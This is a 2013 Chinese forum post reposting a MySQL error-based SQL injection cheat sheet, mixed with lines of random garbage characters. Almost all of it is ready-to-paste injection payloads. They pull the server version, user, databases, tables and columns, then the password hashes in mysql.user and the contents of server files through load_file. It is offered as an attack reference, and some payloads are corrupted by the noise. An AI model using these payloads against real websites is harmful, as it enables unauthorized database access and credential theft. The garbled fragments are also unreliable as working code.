Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
0 U6 A# X# A* E- W+ H
$ F$ I4 p1 N0 X* A
' N7 k0 M+ K% l" W, k* g& S' sMysql暴错注入参考（pdf），每天一贴。。。
0 ~3 m$ i' h, ?
MySql Error Based Injection Reference
+ R  M. i9 C  n6 ^6 u9 t[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
' H! b3 Y0 d/ a5 t. OTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
: q) p5 ]0 x( e: ]小部分版本使用name_const()时会报错.可以用给出的Method.2测试
2 X6 I7 z# `8 u查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
. a; s3 Z% I5 D( _5 Y7 {* @% SMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
& l& j% A4 }2 ?% I查询当前用户:
( M" |2 `7 B* o  pMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
; t1 X% u$ o5 L! H5 LMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
. }0 p4 o9 L; n0 u3 ]. mand(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
7 Q2 o) r9 G! r' A, D& HMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
1 k% y! p6 R5 jMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
5 H/ t, Y! a. O# g1 PLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
0 D7 h* u# Q1 ?7 R8 o6 }顺序替换
) ^( A( |( w: W' {5 ~' ?爆指定库数目:
, m3 t) _, @" a3 [9 mand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+ B! t% z  O" m, O$ R! B3 i( B0 S+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
' H( A3 u' D1 A$ Aand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
& q# M5 d# P* a# @able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
$ y  `) `. H5 d  ?" ^& K! Qbles+group+by+x)a)+and+1=1
" ^, n+ U. Y) ]$ `0x6D7973716C=Mysql 将n顺序替换
+ X. a% O1 f+ o. V2 }8 F# I爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
1 h& j) p9 E  Y  k8 E& V$ ?4 M+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
( E5 X: \/ p' cand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
7 |6 ]/ {. U  `. d5 floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
7 ?2 ~5 k+ D: d- ]. C1 J依次暴内容:
, W) h' C$ s# O' l: @5 O$ Hand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
; s' X8 P+ n' V将n顺序替换
爆文件内容:
  ]; I- e0 A" C* H: P6 s5 Yand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
1 q. q$ B8 }5 bfrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
# a% ]+ m1 L$ UThx for reading.

不要下载也可以，